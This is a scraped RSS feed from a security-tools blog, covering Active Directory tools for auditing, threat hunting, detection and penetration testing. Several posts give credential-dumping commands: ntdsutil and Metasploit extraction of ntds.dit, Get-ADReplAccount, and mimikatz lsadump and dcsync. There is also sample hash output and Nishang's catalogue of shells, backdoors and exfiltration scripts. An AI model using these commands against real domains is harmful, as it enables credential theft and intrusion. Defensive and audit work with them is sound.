Warning: fopen(/home/seclistu/public_html/wp-content/iosec_admin/banlisttemp): failed to open stream: Permission denied in /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php on line 273

Warning: fopen(/home/seclistu/public_html/wp-content/iosec_admin/banlist): failed to open stream: Permission denied in /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php on line 277

Warning: fopen(/home/seclistu/public_html/wp-content/iosec_admin/ips): failed to open stream: Permission denied in /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php on line 281

Warning: Cannot modify header information - headers already sent by (output started at /home/seclistu/public_html/wp-content/plugins/iosec-anti-flood-security-gateway-module/iosec.php:273) in /home/seclistu/public_html/wp-includes/feed-rss2.php on line 8
active-directory – Security List Network™ http://seclist.us Wed, 25 Apr 2018 22:10:46 +0000 en-US hourly 1 THRecon – Threat Hunting Reconnaissance Toolkit. http://seclist.us/threcon-threat-hunting-reconnaissance-toolkit.html Thu, 15 Feb 2018 22:03:09 +0000 http://seclist.us/?p=16543 THRecon is a Powershell module for Threat-Hunting and Reconnaissance toolkit.
Function Feature:
+ Get-THR_ADS: Performs a search for alternate data streams (ADS) on a system. Default starting directory is c:\temp.
+ Get-THR_ARP: Gets the arp cache from all connected interfaces for the given computer(s).
+ Get-THR_Autoruns: Gets a list of programs that auto start for the given computer(s).
+ Get-THR_BitLocker: Gets the current BitLocker details to include recovery key of a given system.
+ Get-THR_Computer: Gets general system information on a given system. Includes data from Win32_ComputerSystem, Win32_OperatingSystem, and win32_BIOS.

THRecon

+ Get-THR_DLLs: Gets a list of DLLs loaded by all process on a given system.
+ Get-THR_DNS: Gets the DNS cache from all connected interfaces for the given computer(s).
+ Get-THR_Drivers: Gets a list of drivers for the given computer(s).
+ Get-THR_EnvVars: Retreives the values of all environment variables from one or more systems.
+ Get-THR_GroupMembers: Gets a list of the members of each local group on a given system.
+ Get-THR_Handles: Gets a list of Handles loaded by all process on a given system.
+ Get-THR_Hardware: Gets a list of installed devices for the given computer(s).
+ Get-THR_Hosts: Gets the arp cache from all connected interfaces for the given computer(s).
+ And Many More..

Dependencies:
+ Powershell v3.0 or above

Use and Download:

git clone https://github.com/TonyPhipps/THRecon && cd THRecon
Import-Module .\THRecon.psm1
Get-Command -Module THRecon

Source: https://github.com/TonyPhipps

]]>
Vindicate An LLMNR/NBNS/mDNS Spoofing Detection Toolkit. http://seclist.us/vindicate-an-llmnr-nbns-mdns-spoofing-detection-toolkit.html Tue, 13 Feb 2018 22:05:01 +0000 http://seclist.us/?p=16517 What is Vindicate?
Vindicate is a tool which detects name service spoofing, often used by IT network attackers to steal credentials (e.g. Windows Active Directory passwords) from users. It’s designed to detect the use of hacking tools such as Responder, Inveigh, NBNSpoof, and Metasploit’s LLMNR, NBNS, and mDNS spoofers, whilst avoiding false positives. This can allow a Blue Team to quickly detect and isolate attackers on their network. It takes advantage of the Windows event log to quickly integrate with an Active Directory network, or its output can be piped to a log for other systems.

There’s a diagram explaining spoofing attacks and how Vindicate works on the wiki.

Requires .NET Framework 4.5.2
What is LLMNR/NBNS/mDNS spoofing and why do I need to detect it?
+ pentest.blog: What is LLMNR & WPAD and How to Abuse Them During Pentest ?
+ Aptive Consulting: LLMNR / NBT-NS Spoofing Attack Network Penetration Testing
+ GracefulSecurity: Stealing Accounts: LLMNR and NBT-NS Spoofing

Attackers might be stealing all sorts of credentials on your network (everything from Active Directory credentials to personal email accounts to database passwords) from right under your nose and you may be completely unaware it’s happening.

vindicate v1.0.0spo

Notes
– *By default, Vindicate uses lookup names that shouldn’t exist in any network but look semi-realistic to an attacker who might be watching, to avoid false positives where you have real services that might rely on these name lookups. If systems with those names really do exist on your network, Vindicate will give false positives.
– Due to the above, Vindicate works best with custom flags that are tuned to your environment. Use -h to get help.
– As Vindicate uses a partial custom name service implementation written in .NET, it works even if multicast resolution is disabled on the client.
– Vindicate currently mostly relies on getting a WPAD response, with the SMB detection being very basic (it just checks if an SMB port is in use). If Vindicate is adopted and used I’ll write an SMB client to properly verify SMB servers and increase Vindicate’s confidence in its detection.
– Vindicate can detect mDNS spoofing (often associated with Mac OS), but this detection won’t work on Windows if multicast resolution is enabled as a required port is in use by the operating system. Consider disabling it for security reasons anyway (and reset the DNS Service to apply the changes).
– Vindicate does not require administrative permissions to run and is sad if you run it with high privileges.
– Vindicate can send false credentials to an attacker to frustrate their movements. Check out the -u, -p, and -d flags.
– Vindicate has been written with cross-platform use in mind, but has not been tested for this purpose yet. If this is desired, let me know with an issue and your platform.

Use and Download:

git clone https://github.com/Rushyo/VindicateTool && cd VindicateTool
cd ReleaseBinaries
VindicateCLI.exe -h

Source: https://github.com/Rushyo

]]>
crack-dit makes it easier to perform password audits against Windows-based corporate environments. http://seclist.us/crack-dit-makes-it-easier-to-perform-password-audits-against-windows-based-corporate-environments.html Tue, 02 Jan 2018 14:30:10 +0000 http://seclist.us/?p=16206 cracke-dit(“Cracked It”) makes it easier to perform regular password audits against Active Directory environments.
Ensuring your users have strong passwords throughout the organisation is still your best line of defence against common attacks. Many organisations over estimate just how secure their users’ passwords are. “London123”, “Winter2017”, “Passw0rd” – all complex passwords, according to the default Group Policy rules.

By performing regular audits, you can identify users with weak passwords and take action inline with your policies and procedures.

cracke-dit v1.0

# General Tips

1. Introduce internal training on what a secure password is, why they’re important and embed it in to your induction programme.

2. Consider rolling out a password manager and adequate training for all of your users – stronger, longer and more unique passwords is better for everyone.

3. Gradually increase your password minimum length requirement to 12 characters.

4. Phase out forcing your users to “reset password every X days”. There is research to suggest that this doesn’t help create strong passwords, but in fact has the opposite effect.

5. Carry out a password audit quarterly. Do not name and shame people. Get HR buy-in and introduce a “3 strike system” that will carry a formal warning.

Usage:

git clone https://github.com/eth0izzle/cracke-dit && cd cracke-dit
pip install -r requirements.txt

The first step in your password cracking adventure is to extract a copy of the Active Directory database, ntds.dit, which contains the password hashes. I like to involve and get as much buy-in as possible from the Admins so I will ask them very nicely to extract the files for me. However if you have domain credentials you can do it yourself:


1. On a Domain Controller open up an elevated command prompt.

2. Run `ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q`.

3. **Securely** extract `c:\temp\Active Directory\ntds.dit` and `c:\temp\registry\SYSTEM` to your system with cracke-dit.

Or remotely via metasploit. 
Run the module `auxiliary/admin/smb/psexec_ntdsgrab` and fill in the required options. This requires SMB access via the C$ share.

python cracked-dit.py --system SYSTEM --ntds samples/ntds.dit

Source: https://github.com/eth0izzle

]]>
ketshash – tool for detecting suspicious privileged NTLM connections. http://seclist.us/ketshash-tool-for-detecting-suspicious-privileged-ntlm-connections.html Thu, 21 Dec 2017 00:23:49 +0000 http://seclist.us/?p=16107 Ketshash is A little tool for detecting suspicious privileged NTLM connections, in particular Pass-The-Hash attack, based on event viewer logs.

Requirements
Account with the following privileges:
– Access to remote machines’ security event logs
– ActiveDirectory read permissions (standard domain account)
– Computers synchronized with the same time, otherwise it can affect the results
– Minimum PowerShell 2.0

Ketshash v1.2

Overview
Ketshash is a tool for detecting suspicious privileged NTLM connections, based on the following information:
+ Security event logs on the monitored machines (Login events)
+ Authentication events from Active Directory

Usage:

git clone https://github.com/cyberark/ketshash && cd ketshash
Import-Module .\Ketshash.ps1

Example:
Invoke-DetectPTH -TargetComputers "MARS-9" -LogFile "C:\tmp\log.txt"

Source: https://github.com/cyberark

]]>
NtdsAudit – An Active Directory security audit utility. http://seclist.us/ntdsaudit-an-active-directory-security-audit-utility.html Wed, 22 Nov 2017 17:05:00 +0000 http://seclist.us/?p=16004 NtdsAudit is an application to assist in auditing Active Directory databases.
It provides some useful statistics relating to accounts and passwords, as shown in the following example. It can also be used to dump password hashes for later cracking.

NtdsAudit

Obtaining the required files:
NtdsAudit requires the ntds.dit Active Directory database, and optionally the SYSTEM registry hive if dumping password hashes. These files are locked by a domain controller and as such cannot be simply copy and pasted. The recommended method of obtaining these files from a domain controller is using the builtin ntdsutil utility.

Usage and Download:

git clone https://github.com/Dionach/NtdsAudit && cd NtdsAudit
right click NtdsAudit.sln open with Visual Studio
then Build Solution

Or Manual Download here:
https://github.com/Dionach/NtdsAudit/releases/download/v2.0.2/NtdsAudit.exe

Source: https://github.com/Dionach

]]>
Nishang v0.7.2 – PowerShell for penetration testing and offensive security. http://seclist.us/nishang-v0-7-2-powershell-for-penetration-testing-and-offensive-security.html Fri, 26 May 2017 19:21:43 +0000 http://seclist.us/?p=14313 Changelog Nishang v0.7.2 from v0.7.0:
0.7.2
– Added Invoke-PowershellTcpOnelineBind to the Shells directory.
0.7.1
– Added Invoke-AmsiBypass to the Bypass directory.

Nishang v0.7.2

Nishang v0.7.0

Nishang v0.7.0

nishang v0.6.9

nishang v0.6.9

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.0 released: PowerShell for penetration testing and offensive security.

Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/

]]>
PowEnum – Penetration testers commonly enumerate active-directory data. http://seclist.us/powenum-penetration-testers-commonly-enumerate-active-directory-data.html Thu, 11 May 2017 15:23:50 +0000 http://seclist.us/?p=14256 PowEnum is a Penetration testers commonly enumerate AD data – providing domain situational awareness and helping to identify soft targets. PowEnum helps automate the cartological view of your target domain.

PowEnum executes common PowerSploit Powerview functions and combines the output into a spreadsheet for easy analysis. All network traffic is only sent to the DC(s).
Syntax Examples:
– Invoke-PowEnum
– Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1
– Invoke-PowEnum -FQDN test.domain.com
– Invoke-PowEnum -Mode SYSVOL
– Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special

PowEnum

Detection:
This enumeration will generate suspicious traffic between the PowEnum system and the target DC(s). If there are security products watching traffic to the DC(s) (i.e. Microsoft ATA) PowEnum will likely get flagged.

Usage:

git clone https://github.com/whitehat-zero/PowEnum && cd PowEnum
Invoke-PowEnum
Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1
Invoke-PowEnum -FQDN test.domain.com
Invoke-PowEnum -Mode SYSVOL
Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special

Source: https://github.com/whitehat-zero

]]>
adpwn – tools for Windows Active-Directory explotaition and pwning. http://seclist.us/adpwn-tools-for-windows-active-directory-explotaition-and-pwning.html Tue, 02 May 2017 23:10:59 +0000 http://seclist.us/?p=14169 ADPWN is a Useful tools for Windows AD explotaition and pwning. dsinternalsparser.py This tool makes easy and faster the dumping process of hashes stored in a domain controller.
Note
* It uses the output of the DSInternals modules that retreives reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from domain controllers.

* As mentioned in DSInternals web page(https://www.dsinternals.com/en/), it is possible to retrieve hashes remotely, instead of the well known method using vssadmin, ESEDBTOOLS and NTDSXtract, pretty slow in some cases because of the NTDS.dit size, ESEDBTOOLS misconfigurations, etc.

DSInternals Parser v1.0

Requirements
– Python 2.7 environment
– DSInternals output file generated with Get-ADReplAccount or Get-ADDBAccount.

TODO:
To extract the hashes remotely:
1. Retrieve all users attributes with the DSinternals module Get-ADReplAccount, and save it to a local file.

Get-ADReplAccount -All -NamingContext 'DC=Example,DC=com' -Server DC1 -Credential $cred >> localfile.txt

The file generated has a format similar to the next one.

DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory: 
Enabled: True
Deleted: False
LastLogon: 
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description: 
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory: 
  Hash 01: 92937945b518814341de3f726500d4ff
  Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
  Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory: 
  Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
  Hash 02: 5a5503d0e85f58abaad3b435b51404ee
  Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
  ClearText: Pa$$w0rd
  Kerberos:
    Credentials:
      DES_CBC_MD5
        Key: 76fe3b5bda911a40
    OldCredentials:
      DES_CBC_MD5
        Key: 7f8c4f38e0ea0b80
    Salt: ADATUM.COMApril
    Flags: 0
  KerberosNew:
    Credentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: a72c8bc96c4a6f03244f0b0067a1e440
        Iterations: 4096
      DES_CBC_MD5
        Key: 76fe3b5bda911a40
        Iterations: 4096
    OldCredentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: 034b512ec64286dec951d6aff8d81fa8
        Iterations: 4096
      DES_CBC_MD5
        Key: 7f8c4f38e0ea0b80
        Iterations: 4096
    OlderCredentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: 29d536ec057f9063747161429b81f056
        Iterations: 4096
      DES_CBC_MD5
        Key: 58f1cbe6e50e1f83
        Iterations: 4096
    ServiceCredentials:
    Salt: ADATUM.COMApril
    DefaultIterationCount: 4096
    Flags: 0
  WDigest:
    Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
    Hash 02: c993da396914645b356ae7816251fcb1
    Hash 03: 6b58530cab34de91189a603e22c2be15
    Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
    Hash 05: 5a762cf59fa31023dcba1ebd4725b443
    Hash 06: c78bac91c0ba25cae5d44460fd65a73b
    Hash 07: 59d73cea16afd1aac6bf8acfa2768621
    Hash 08: d2be383db9469a39736d9e2136054131
    Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
    Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
    Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
    Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
    Hash 13: e899e577d5f81ef5288ab67de07fad9a
    Hash 14: 135452ab86d40c3d47ca849646d5e176
    Hash 15: a84c367eaa334d0a4cb98e36da011e0f
    Hash 16: 61a458eb70440b1a92639452f0c2c948
    Hash 17: 238f4059776c3575be534afb46be4ccf
    Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
    Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
    Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
    Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
    Hash 22: f1685383b0c131035ae264ee5bd24a8d
    Hash 23: 3119e42886b01cad00347e72d0cee594
    Hash 24: ebef7f2c730e17ded8cba1ed20122602
    Hash 25: 7d99673c9895e0b9c484e430578ee78e
    Hash 26: e1e20982753c6a1140c1a8241b23b9ea
    Hash 27: e5ec1c63e0e549e49cda218bc3752051
    Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
    Hash 29: 84010d657e6b58ce233fae2bd7644222

2. Parse the localfile with dsinternaslparser.py
./dsinternalsparser.py -o dump localfile.txt
3. After execution, if no options are given, dsinternalsparser.py creates 6 files.
– NTLM File (dump_ntlm.txt): Contains username and current NTLM Hash.
– NTLM History File (dump_ntlm_history.txt): Contains username and NTLM History Hashes.
– LM File (dump_lm.txt): Contains username and current LM Hash.
– Cleartext File (dump_cleartext.txt): Contains username and Cleartext password, if exists.
– NTLM History File (dump_wdigest.txt): Contains username and WDigest history Hashes.

Usage:

git clone https://github.com/r4wd3r/ADPWN && cd ADPWN

wget https://raw.githubusercontent.com/r4wd3r/ADPWN/master/dsinternalsparser/dsinternalsparser.py
chmod 755 dsinternalsparser.py
python dsinternalsparser.py

Source: https://github.com/r4wd3r

]]>
ad-ldap-enum ~ An LDAP based Active Directory user and group enumeration tool. http://seclist.us/ad-ldap-enum-an-ldap-based-active-directory-user-and-group-enumeration-tool.html Wed, 12 Apr 2017 09:09:57 +0000 http://seclist.us/?p=14020 ad-ldap-enum is a Python script that was developed to discover users and their group memberships from Active Directory. In large Active Directory environments, tools such as NBTEnum were not performing fast enough. By executing LDAP queries against a domain controller, ad-ldap-enum is able to target specific Active Directory attributes and build out group membership quickly.
ad-ldap-enum outputs three tab delimited files ‘Domain Group Membership.tsv’, ‘Extended Domain User Information.tsv’, and ‘Extended Domain Computer Information.tsv’. The first file contains users, computers, groups, and their memberships. The second file contains users and extra information about the users from Active Directory (e.g. a user’s home folder or email address). The third file contains devices in the Domain Computers group and extra information about them from Active Directory (e.g. operating system type and service pack version).

ad-ldap-enum

ad-ldap-enum supports both authenticated and unauthenticated LDAP connections. Additionally, ad-ldap-enum can process nested groups and display a user’s actual group membership.
Dependencies:
– Python 2.7.x
– python-ldap, python-pyasn1 python module.

Usage:

git clone https://github.com/CroweCybersecurity/ad-ldap-enum && cd ad-ldap-enum
pip install python-ldap python-pyasn1
python ad-ldap-enum.py -h

Source: https://github.com/CroweCybersecurity

]]>
CrackMapExec v4.0 – A swiss army knife for pentesting networks. http://seclist.us/crackmapexec-v4-0-a-swiss-army-knife-for-pentesting-networks.html Fri, 07 Apr 2017 09:30:54 +0000 http://seclist.us/?p=13969 Changelog CrackMapExec v4.0-dev:
– Added missing requirement
– Fixed an edge case in gpp_decrypt.py also renamed to gpp_password
– Added the gpp_autologin module
– Added a workaround for the current impacket smb server bug in get_keystrokes
– fixed formatting in the SMB database navigator
– fixed an error where DC would have there dc attribute overwritten
– Other stuff that i don’t remember

CrackMapExec v4.0

crackmapexec

crackmapexec v3.1.3

CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
From enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more!

The biggest improvements over the above tools are:
– Pure Python script, no external tools required
– Fully concurrent threading
– Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc…
– Opsec safe (no binaries are uploaded to dump clear-text credentials, inject shellcode etc…)
Intallation on Kali Linux, Ubuntu and all Linux Platform:

git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
pip install --upgrade -r requirements.txt
python crackmapexec.py

Update:
git pull origin master
git submodule init && git submodule update --recursive

Upgrade using pip
pip2 install crackmapexec --upgrade

CrackMapExec Usage

CrackMapExec Usage

Download Old Stable version: v3.1.5.zip  | v3.1.5.tar.gz  | Our Post Before
Source: https://github.com/byt3bl33d3r

]]>
Radiuid – An application to extract User-to-IP mappings from RADIUS accounting data. http://seclist.us/radiuid-an-application-to-extract-user-to-ip-mappings-from-radius-accounting-data.html Mon, 26 Dec 2016 02:37:15 +0000 http://seclist.us/?p=12935 WHAT IS RADIUID:
RadiUID is a Linux-based application built to take everyday RADIUS accounting information generated by RADIUS authenticators like wireless systems, firewalls, etc (which contains username and IP info) and send that ephemeral IP and username mapping info to a Palo Alto firewall to be used by the User-ID system for user or group-based access-list filtering, or intelligent reporting.

HOW IT WORKS?
RadiUID uses FreeRADIUS as a backend service to listen on RADIUS accounting ports (typically TCP\UDP 1813) and write recieved accounting information to accounting logs.

RadiUID then parses these logs, pulls down the User and IP mapping information and pushes those mappings to the Palo Alto firewall using the published RESTful XML API.
RadiUID runs as a system service on Linux and is very easy to configure and use. All configuration and interaction with RadiUID is via command line on the Linux BASH shell. Once the installer completes, RadiUID can be invoked from the command shell by typing radiuid followed by the desired command. Hit the [TAB] key for command options or hit [ENTER] for the list of options!

radiuid

CHANGELOG UPDATES IN V2.3.0 –> V2.3.1:
BUG FIXES:
+ ISSUE #22: Repaired broken RadiUID service control when in a container. Now you can start, stop, and restart FreeRADIUS and RadiUID services from within the container without having to restart the container from the host.

Usage, download and upgrade from source:

Install Docker:
### Install and configure SSH Server for SSH access to container ###
RUN yum install -y openssh openssh-server openssh-clients sudo passwd
RUN sshd-keygen
RUN sed -i "s/UsePAM.*/UsePAM yes/g" /etc/ssh/sshd_config
RUN sed -i "s/#UsePrivilegeSeparation.*/UsePrivilegeSeparation no/g" /etc/ssh/sshd_config
RUN useradd admin -G wheel -s /bin/bash -m
RUN echo 'root:radiuid' | chpasswd
RUN echo '%wheel ALL=(ALL) ALL' >> /etc/sudoers

### Download and install RadiUID from latest release ###
RUN curl -sL https://codeload.github.com/PackeTsar/radiuid/tar.gz/2.3.1 | tar xz
RUN cd radiuid-2.3.1;python radiuid.py request reinstall replace-config no-confirm
RUN cd radiuid-2.3.1;python radiuid.py request freeradius-install no-confirm

### Expose ports and provide run commands ###
EXPOSE 1813/udp
EXPOSE 1813/tcp
EXPOSE 22/tcp
CMD radiusd & radiuid run >> /etc/radiuid/STDOUT & /usr/sbin/sshd >> /etc/radiuid/SSH-STDOUT & /bin/bash

### Download and install RadiUID from latest release ###
git clone https://github.com/PackeTsar/radiuid && radiuid
python radiuid.py request reinstall replace-config no-confirm
python radiuid.py request freeradius-install no-confirm

### Expose ports and provide run commands ###
EXPOSE 1813/udp
EXPOSE 1813/tcp
CMD radiusd & radiuid run >> /etc/radiuid/STDOUT & /bin/bash

Source: https://github.com/PackeTsar

]]>
mimikatz v2.1 windows server 2016 edition – A little tool to play with Windows security. http://seclist.us/mimikatz-v2-1-windows-server-2016-edition-a-little-tool-to-play-with-windows-security.html Tue, 25 Oct 2016 02:51:23 +0000 http://seclist.us/?p=12253 changelog mimikatz v2.1 Windows Server 2016 edition:
* Full support for Windows 10 Anniversary update & Windows Server 2016 (1607 – build 14393)mimikatz-windows-server-2016

mimikatz-june

mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.
It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

Build
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
+ for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)
+ for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800
mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)

Build the solution:

+Download zip file, then unzip it
+ risht click open with visual studio isual Studio 2012 or 2013 after
+ After opening the solution, Build / Build Solution (you can change architecture)
+ mimikatz is now built and ready to be used! (Win32 / x64)
-- you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

Usage:
* Crypto:
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

* vault & lsadump
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Downloadmimikatz_trunk.zip | Our Post Before
Source : https://github.com/gentilkiwi | http://blog.gentilkiwi.com/mimikatz

]]>